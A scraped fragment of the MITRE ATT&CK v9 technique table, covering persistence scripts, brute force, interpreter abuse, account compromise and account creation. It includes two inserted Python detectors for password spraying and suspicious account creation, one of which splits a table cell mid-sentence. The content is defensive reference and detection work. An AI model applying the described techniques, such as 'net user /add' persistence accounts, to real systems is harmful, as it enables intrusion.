</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1037/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1037/003"> Network Logon Script </a> </td> <td> Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects. These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1037/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1037/004"> RC Scripts </a> </td> <td> Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1037/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1037/005"> Startup Items </a> </td> <td> Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1217"> T1217 </a> </td> <td> <a href="/versions/v9/techniques/T1217"> Browser Bookmark Discovery </a> </td> <td> Adversaries may enumerate browser bookmarks to learn more about compromised hosts. 
Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1176"> T1176 </a> </td> <td> <a href="/versions/v9/techniques/T1176"> Browser Extensions </a> </td> <td> Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1110"> T1110 </a> </td> <td> <a href="/versions/v9/techniques/T1110"> Brute Force </a> </td> <td> Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1110/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1110/001"> Password Guessing </a> </td> <td> Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. 
An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1110/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1110/002"> Password Cracking </a> </td> <td> Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes is obtained. <a href="/versions/v9/techniques/T1003">OS Credential Dumping</a> is used to obtain password hashes; this may only get an adversary so far when <a href="/versions/v9/techniques/T1550/002">Pass the Hash</a> is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. The plaintext password recovered from a successfully cracked hash may be used to log into systems, resources, and services to which the account has access. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1110/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1110/003"> Password Spraying </a> </td> <td> Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. 
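As an added illustration that is not part of the ATT&amp;CK text, the Python below shows how Password Guessing (.001) and Password Spraying (.003) look different in authentication logs: guessing piles many failures onto one account from one source, while spraying spreads one or two failures across many accounts from the same source, staying under each account's lockout threshold. The sshd log lines are constructed with RFC 5737 test addresses, and the thresholds (a 10-minute window, six failures, five distinct accounts) are assumptions to tune per environment.

```python
"""Separate password guessing (T1110.001) from password spraying (T1110.003) in
sshd authentication logs. Added example with constructed log lines, not MITRE content."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines (RFC 5737 test addresses), not from a real host:
# 198.51.100.7 tries one password against eight accounts (spray),
# 203.0.113.5 hammers root and finally gets in (guessing), and
# 192.0.2.20 is a user who mistypes twice (benign).
SAMPLE_LOG = """\
Mar 10 08:00:01 host sshd[2001]: Failed password for alice from 198.51.100.7 port 50112 ssh2
Mar 10 08:00:02 host sshd[2002]: Failed password for bob from 198.51.100.7 port 50113 ssh2
Mar 10 08:00:03 host sshd[2003]: Failed password for carol from 198.51.100.7 port 50114 ssh2
Mar 10 08:00:04 host sshd[2004]: Failed password for dave from 198.51.100.7 port 50115 ssh2
Mar 10 08:00:05 host sshd[2005]: Failed password for invalid user erin from 198.51.100.7 port 50116 ssh2
Mar 10 08:00:06 host sshd[2006]: Failed password for frank from 198.51.100.7 port 50117 ssh2
Mar 10 08:00:07 host sshd[2007]: Failed password for grace from 198.51.100.7 port 50118 ssh2
Mar 10 08:00:08 host sshd[2008]: Failed password for heidi from 198.51.100.7 port 50119 ssh2
Mar 10 08:05:00 host sshd[2101]: Failed password for root from 203.0.113.5 port 41000 ssh2
Mar 10 08:05:01 host sshd[2102]: Failed password for root from 203.0.113.5 port 41001 ssh2
Mar 10 08:05:02 host sshd[2103]: Failed password for root from 203.0.113.5 port 41002 ssh2
Mar 10 08:05:03 host sshd[2104]: Failed password for root from 203.0.113.5 port 41003 ssh2
Mar 10 08:05:04 host sshd[2105]: Failed password for root from 203.0.113.5 port 41004 ssh2
Mar 10 08:05:05 host sshd[2106]: Failed password for root from 203.0.113.5 port 41005 ssh2
Mar 10 08:05:06 host sshd[2107]: Failed password for root from 203.0.113.5 port 41006 ssh2
Mar 10 08:05:07 host sshd[2108]: Failed password for root from 203.0.113.5 port 41007 ssh2
Mar 10 08:05:08 host sshd[2109]: Accepted password for root from 203.0.113.5 port 41008 ssh2
Mar 10 08:10:00 host sshd[2201]: Failed password for alice from 192.0.2.20 port 60000 ssh2
Mar 10 08:10:05 host sshd[2202]: Failed password for alice from 192.0.2.20 port 60001 ssh2
Mar 10 08:10:09 host sshd[2203]: Accepted password for alice from 192.0.2.20 port 60002 ssh2
"""

LINE = re.compile(r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
                  r'(?P<result>Failed|Accepted) password for (?:invalid user )?'
                  r'(?P<user>\S+) from (?P<ip>\S+)')


def parse(log, year=2021):
    """Return auth events as dicts; syslog lines carry no year, so one is supplied."""
    events = []
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            events.append({'ts': datetime.strptime(f"{year} {m['ts']}", '%Y %b %d %H:%M:%S'),
                           'result': m['result'], 'user': m['user'], 'ip': m['ip']})
    return events


def classify(events, window=timedelta(minutes=10), min_failures=6, spray_users=5):
    """Per source IP, slide `window` over the failures and label the burst by how
    many distinct accounts it touched."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e['ip']].append(e)
    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e['ts'])
        fails = [e for e in evs if e['result'] == 'Failed']
        start = 0
        for end in range(len(fails)):
            while fails[end]['ts'] - fails[start]['ts'] > window:
                start += 1
            burst = fails[start:end + 1]
            if len(burst) < min_failures:
                continue
            users = {e['user'] for e in burst}
            if len(users) >= spray_users:
                tech = 'T1110.003 password spraying'   # one or two tries per account, many accounts
            elif len(users) == 1:
                tech = 'T1110.001 password guessing'   # many tries, one account
            else:
                tech = 'T1110 brute force'
            findings[ip] = {'technique': tech, 'failures': len(burst), 'accounts': len(users)}
        # A success after repeated failures from a flagged source is the event to act on.
        failed = defaultdict(int)
        for e in evs:
            if e['result'] == 'Failed':
                failed[e['user']] += 1
            elif failed[e['user']] >= 3 and ip in findings:
                findings[ip]['compromised'] = e['user']
    return findings


if __name__ == '__main__':
    for ip, f in classify(parse(SAMPLE_LOG)).items():
        print(ip, f)
```

The per-account lockout counter that most systems implement never fires for the spraying source in this sample, because each account sees a single failure; only the per-source, cross-account view catches it. The benign user with two typos is left alone by both thresholds.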
Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1110/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1110/004"> Credential Stuffing </a> </td> <td> Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1612"> T1612 </a> </td> <td> <a href="/versions/v9/techniques/T1612"> Build Image on Host </a> </td> <td> Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1115"> T1115 </a> </td> <td> <a href="/versions/v9/techniques/T1115"> Clipboard Data </a> </td> <td> Adversaries may collect data stored in the clipboard from users copying information within or between applications. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1580"> T1580 </a> </td> <td> <a href="/versions/v9/techniques/T1580"> Cloud Infrastructure Discovery </a> </td> <td> An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1538"> T1538 </a> </td> <td> <a href="/versions/v9/techniques/T1538"> Cloud Service Dashboard </a> </td> <td> An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1526"> T1526 </a> </td> <td> <a href="/versions/v9/techniques/T1526"> Cloud Service Discovery </a> </td> <td> An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1059"> T1059 </a> </td> <td> <a href="/versions/v9/techniques/T1059"> Command and Scripting Interpreter </a> </td> <td> Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. 
These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of <a href="/versions/v9/techniques/T1059/004">Unix Shell</a> while Windows installations include the <a href="/versions/v9/techniques/T1059/003">Windows Command Shell</a> and <a href="/versions/v9/techniques/T1059/001">PowerShell</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1059/001"> PowerShell </a> </td> <td> Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1059/002"> AppleScript </a> </td> <td> Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1059/003"> Windows Command Shell </a> </td> <td> Adversaries may abuse the Windows command shell for execution. The Windows command shell (<a href="/versions/v9/software/S0106">cmd</a>) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1059/004"> Unix Shell </a> </td> <td> Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1059/005"> Visual Basic </a> </td> <td> Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as <a href="/versions/v9/techniques/T1559/001">Component Object Model</a> and the <a href="/versions/v9/techniques/T1106">Native API</a> through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1059/006"> Python </a> </td> <td> Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1059/007"> JavaScript </a> </td> <td> Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1059/008"> Network Device CLI </a> </td> <td> Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious commands and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1092"> T1092 </a> </td> <td> <a href="/versions/v9/techniques/T1092"> Communication Through Removable Media </a> </td> <td> Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by <a href="/versions/v9/techniques/T1091">Replication Through Removable Media</a>. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1586"> T1586 </a> </td> <td> <a href="/versions/v9/techniques/T1586"> Compromise Accounts </a> </td> <td> Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. <a href="/versions/v9/techniques/T1585">Establish Accounts</a>), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1586/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1586/001"> Social Media Accounts </a> </td> <td> Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. 
<a href="/versions/v9/techniques/T1585/001">Social Media Accounts</a>), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1586/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1586/002"> Email Accounts </a> </td> <td> Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct <a href="/versions/v9/techniques/T1598">Phishing for Information</a> or <a href="/versions/v9/techniques/T1566">Phishing</a>. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: <a href="/versions/v9/techniques/T1583/001">Domains</a>). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1554"> T1554 </a> </td> <td> <a href="/versions/v9/techniques/T1554"> Compromise Client Software Binary </a> </td> <td> Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1584"> T1584 </a> </td> <td> <a href="/versions/v9/techniques/T1584"> Compromise Infrastructure </a> </td> <td> Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. 
Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle. Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1584/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1584/001"> Domains </a> </td> <td> Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant. An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1584/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1584/002"> DNS Server </a> </td> <td> Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: <a href="/versions/v9/techniques/T1071">Application Layer Protocol</a>). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1584/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1584/003"> Virtual Private Server </a> </td> <td> Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. 
There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1584/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1584/004"> Server </a> </td> <td> Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a <a href="/versions/v9/techniques/T1583/004">Server</a> or <a href="/versions/v9/techniques/T1583/003">Virtual Private Server</a>, adversaries may compromise third-party servers in support of operations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1584/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1584/005"> Botnet </a> </td> <td> Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale <a href="/versions/v9/techniques/T1566">Phishing</a> or Distributed Denial of Service (DDoS). 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1584/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1584/006"> Web Services </a> </td> <td> Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control (<a href="/versions/v9/techniques/T1102">Web Service</a>) or <a href="/versions/v9/techniques/T1567">Exfiltration Over Web Service</a>. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1609"> T1609 </a> </td> <td> <a href="/versions/v9/techniques/T1609"> Container Administration Command </a> </td> <td> Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1613"> T1613 </a> </td> <td> <a href="/versions/v9/techniques/T1613"> Container and Resource Discovery </a> </td> <td> Adversaries may attempt to discover containers and other resources that are available within a container environment. 
Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1136"> T1136 </a> </td> <td> <a href="/versions/v9/techniques/T1136"> Create Account </a> </td> <td> Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1136/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1136/001"> Local Account </a> </td> <td> Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the <code>net user /add</code> command can be used to create a local account. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1136/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1136/002"> Domain Account </a> </td> <td> Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account. 
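Both <code>net user /add</code> variants above leave a 4720 event (user account created) on the system that owns the account: the member host for a local account, a domain controller for a domain account. The Python below is an added example, not part of the ATT&amp;CK page; it joins each 4720 to the 4732 (local group) and 4728 (global group) membership events that typically follow a persistence-oriented account creation, and it joins on the new account's SID rather than its name, which is how those events identify the member. The events are constructed JSON lines, and the domain-controller list, authorized provisioning identity and privileged-group set are assumptions standing in for an environment's own inventory.

```python
"""Surface account creation (T1136.001 local, T1136.002 domain) that is followed by
privileged group membership. Added example with constructed events, not MITRE content."""
import json
from datetime import datetime, timedelta

# Constructed Security events as JSON lines, using the field names of 4720 (user
# account created), 4732 (member added to a local group) and 4728 (member added to
# a global group). Not real data; SIDs, hosts and user names are placeholders.
SAMPLE_EVENTS = """\
{"ts":"2021-03-10T08:00:00Z","EventID":4720,"Computer":"WS01","SubjectUserName":"jdoe","TargetUserName":"svc_backup2","TargetSid":"S-1-5-21-1111-2222-3333-1105"}
{"ts":"2021-03-10T08:00:21Z","EventID":4732,"Computer":"WS01","SubjectUserName":"jdoe","TargetUserName":"Administrators","MemberSid":"S-1-5-21-1111-2222-3333-1105"}
{"ts":"2021-03-10T09:30:00Z","EventID":4720,"Computer":"DC01","SubjectUserName":"svc_provisioning","TargetUserName":"asmith","TargetSid":"S-1-5-21-4444-5555-6666-2201"}
{"ts":"2021-03-10T11:00:00Z","EventID":4720,"Computer":"DC01","SubjectUserName":"jdoe","TargetUserName":"helpdesk2","TargetSid":"S-1-5-21-4444-5555-6666-2202"}
{"ts":"2021-03-10T11:02:00Z","EventID":4728,"Computer":"DC01","SubjectUserName":"jdoe","TargetUserName":"Domain Admins","MemberSid":"S-1-5-21-4444-5555-6666-2202"}
{"ts":"2021-03-10T12:00:00Z","EventID":4720,"Computer":"WS01","SubjectUserName":"jdoe","TargetUserName":"tmp_user","TargetSid":"S-1-5-21-1111-2222-3333-1106"}
"""

DOMAIN_CONTROLLERS = {'DC01'}               # assumption: a 4720 logged on a DC is a domain account
AUTHORIZED_CREATORS = {'svc_provisioning'}  # assumption: the IAM automation identity
PRIVILEGED_GROUPS = {'Administrators', 'Domain Admins', 'Enterprise Admins',
                     'Backup Operators', 'Remote Desktop Users'}


def load(lines):
    """Parse JSON lines into events sorted by time."""
    events = []
    for line in lines.splitlines():
        if line.strip():
            e = json.loads(line)
            e['ts'] = datetime.strptime(e['ts'], '%Y-%m-%dT%H:%M:%SZ')
            events.append(e)
    return sorted(events, key=lambda e: e['ts'])


def correlate(events, window=timedelta(hours=1)):
    """For each 4720, collect 4728/4732 events within `window` whose MemberSid equals
    the new account's TargetSid. Joining on SID rather than name survives renames and
    the '-' that 4732 commonly carries in its member account-name field."""
    findings = []
    for c in (e for e in events if e['EventID'] == 4720):
        groups = [g['TargetUserName'] for g in events
                  if g['EventID'] in (4728, 4732)
                  and g.get('MemberSid') == c['TargetSid']
                  and timedelta(0) <= g['ts'] - c['ts'] <= window]
        privileged = [g for g in groups if g in PRIVILEGED_GROUPS]
        if privileged or c['SubjectUserName'] not in AUTHORIZED_CREATORS:
            findings.append({
                'technique': 'T1136.002' if c['Computer'] in DOMAIN_CONTROLLERS else 'T1136.001',
                'account': c['TargetUserName'], 'host': c['Computer'],
                'created_by': c['SubjectUserName'], 'groups': privileged,
                'severity': 'high' if privileged else 'medium',
            })
    return findings


if __name__ == '__main__':
    for f in correlate(load(SAMPLE_EVENTS)):
        print(f)
```

In the sample, the creation by the provisioning identity with no group change is the only one that produces nothing; the two creations that are promoted into a privileged group within the window come out as high, and the unexplained creation with no group change as medium.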
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1136/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1136/003"> Cloud Account </a> </td> <td> Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1543"> T1543 </a> </td> <td> <a href="/versions/v9/techniques/T1543"> Create or Modify System Process </a> </td> <td> Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. On macOS, launchd processes known as <a href="/versions/v9/techniques/T1543/004">Launch Daemon</a> and <a href="/versions/v9/techniques/T1543/001">Launch Agent</a> are run to finish system initialization and load user-specific parameters. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1543/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1543/001"> Launch Agent </a> </td> <td> Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>$HOME/Library/LaunchAgents</code>. These launch agents have property list files which point to the executables that will be launched. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1543/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1543/002"> Systemd Service </a> </td> <td> Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources. Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1543/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1543/003"> Windows Service </a> </td> <td> Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions. Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and <a href="/versions/v9/software/S0075">Reg</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1543/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1543/004"> Launch Daemon </a> </td> <td> Adversaries may create or modify launch daemons to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. 
